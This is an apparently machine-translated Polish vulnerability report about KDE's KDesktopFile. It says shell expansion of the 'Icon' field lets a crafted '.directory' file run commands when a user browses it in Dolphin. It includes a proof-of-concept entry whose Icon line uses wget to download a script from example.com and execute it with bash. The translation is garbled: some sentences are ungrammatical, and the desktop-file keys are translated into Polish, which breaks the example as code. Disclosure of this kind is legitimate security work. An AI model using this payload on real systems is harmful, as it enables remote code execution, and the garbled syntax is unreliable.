W KDE , która umożliwia atakującemu wykonanie dowolnych poleceń, gdy użytkownik przegląda katalog lub archiwum zawierające specjalnie zaprojektowane pliki „.desktop” i „.directory”. Atak wymaga, aby użytkownik po prostu przejrzał listę plików w menedżerze plików Dolphin, pobrał złośliwy plik na komputer lub przeciągnął skrót na pulpit lub do dokumentu. Problem objawia się w bieżącym wydaniu bibliotek i starsze wersje, aż do KDE 4. Luka nadal występuje (CVE nie przypisane).
Problem wynika z błędnej implementacji klasy KDesktopFile, która podczas przetwarzania zmiennej „Icon” bez właściwej ucieczki przekazuje wartość do funkcji KConfigPrivate::expandString(), która wykonuje rozwinięcie znaków specjalnych powłoki, łącznie z przetwarzaniem ciągi „$(..)” jako polecenia do wykonania. Wykonanie wbrew wymaganiom specyfikacji XDG konstrukcje powłokowe tworzone są bez rozdzielania rodzaju ustawień, tj. nie tylko przy ustalaniu linii poleceń aplikacji, która ma zostać uruchomiona, ale także przy określaniu domyślnie wyświetlanych ikon.
Na przykład zaatakować wyślij użytkownikowi archiwum zip z katalogiem zawierającym plik „.directory”, taki jak:
[Wpis na pulpicie]
Typ=Katalog
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Podczas próby wyświetlenia zawartości archiwum w menedżerze plików Dolphin zostanie pobrany i wykonany skrypt https://example.com/FILENAME.sh.
Źródło: opennet.ru